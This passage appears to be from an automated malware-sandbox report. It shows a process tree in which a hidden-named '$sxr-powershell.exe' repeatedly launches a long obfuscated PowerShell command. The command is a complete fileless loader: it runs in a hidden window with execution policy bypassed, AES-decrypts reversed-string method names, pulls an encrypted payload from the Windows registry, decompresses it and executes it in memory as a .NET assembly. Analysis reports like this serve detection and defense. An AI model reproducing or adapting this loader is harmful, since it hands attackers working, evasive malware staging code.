'')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        34⤵
        
        PID:216
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8992).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        34⤵
        
        PID:9852
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8992).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        34⤵
        Hide Artifacts: Hidden Window
        
        PID:7840
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7840).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        35⤵
        
        PID:5828
        
        C:\Windows\$sxr-powershell.exe
        
